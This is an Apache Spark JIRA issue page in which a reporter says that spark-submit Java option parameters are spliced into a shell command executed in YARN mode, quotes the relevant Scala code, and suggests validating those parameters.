Uploaded image for project: 'Spark'
  1. Spark
  2. SPARK-50142

Unusual parameter behavior

    XMLWordPrintableJSON

Details

    • Improvement
    • Status: Open
    • Critical
    • Resolution: Unresolved
    • 3.5.3
    • None
    • Spark Submit
    • None

    Description

      dear, The parameters of spark-mission submitted by spark-submit  should not be parsed into commands but are parsed into commands,such as spark.executor.extraJavaOptions, spark.executor.defaultJavaOptions,  spark.executor.extraJavaOptions,  spark.driver.defaultJavaOptions. These parameters are used in the direct splice command and the command be executed in yarn mode (bash -c "xxxx" ).

      spark.executor.extraJavaOptions  is used in the direct splice command:

      resource-managers/yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala

      private def prepareCommand(): List[String] = {
      // Extra options for the JVM
      val javaOpts = ListBuffer[String]()

      // Set the JVM memory
      val executorMemoryString = executorMemory + "m"
      javaOpts += "-Xmx" + executorMemoryString

      // Set extra Java options for the executor, if defined
      sparkConf.get(EXECUTOR_JAVA_OPTIONS).foreach

      Unknown macro: { opts => val subsOpt = Utils.substituteAppNExecIds(opts, appId, executorId) javaOpts ++= Utils.splitCommandString(subsOpt).map(YarnSparkHadoopUtil.escapeForShell) }

       

      From a security perspective, data and code (commands) should be handled separately. These parameters can be executed as codes (commands). A sugesstion for this issue that is recommended to verify these parameters to enhance security.

       

      Attachments

        Activity

          People

            Unassigned Unassigned
            youngseaz youngseaz
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated: